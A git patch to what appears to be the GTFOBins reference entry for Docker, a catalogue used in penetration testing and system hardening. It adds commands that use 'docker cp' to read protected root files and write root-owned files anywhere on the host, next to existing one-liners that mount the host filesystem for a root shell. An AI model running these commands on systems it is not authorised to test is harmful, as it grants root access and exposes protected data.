From dcbf66329aa2bc3202652fbc363f980ac5213730 Mon Sep 17 00:00:00 2001 From: Dominic Breuker Date: Tue, 2 Jul 2019 15:53:28 +0200 Subject: [PATCH] Add file read and write as per #64 (temporary solution) --- _gtfobins/docker.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md index beb8c57..5370c40 100644 --- a/_gtfobins/docker.md +++ b/_gtfobins/docker.md @@ -5,6 +5,20 @@ functions: shell: - description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell. code: docker run -v /:/mnt --rm -it alpine chroot /mnt sh + file-write: + - description: Write any file by copying it to an existing container and back to the target destination on the host. The file will be owned by root. + code: | + CONTAINER_ID=existing-docker-container + echo "sensitive config" > /tmp/file.txt + sudo docker cp /tmp/file.txt $CONTAINER_ID:/tmp/file.txt + sudo docker cp $CONTAINER_ID:/tmp/file.txt /target/destination.txt + file-read: + - description: Read any file by copying it to an existing container and back to a new location on the host. + code: | + CONTAINER_ID=existing-docker-container + sudo docker cp /root/protected.txt $CONTAINER_ID:/tmp/file.txt + sudo docker cp $CONTAINER_ID:/tmp/file.txt /home/user/file.txt + cat /home/user/file.txt sudo: - description: Any other Docker Linux image should work, e.g., `debian`. The resulting is a root shell. code: sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh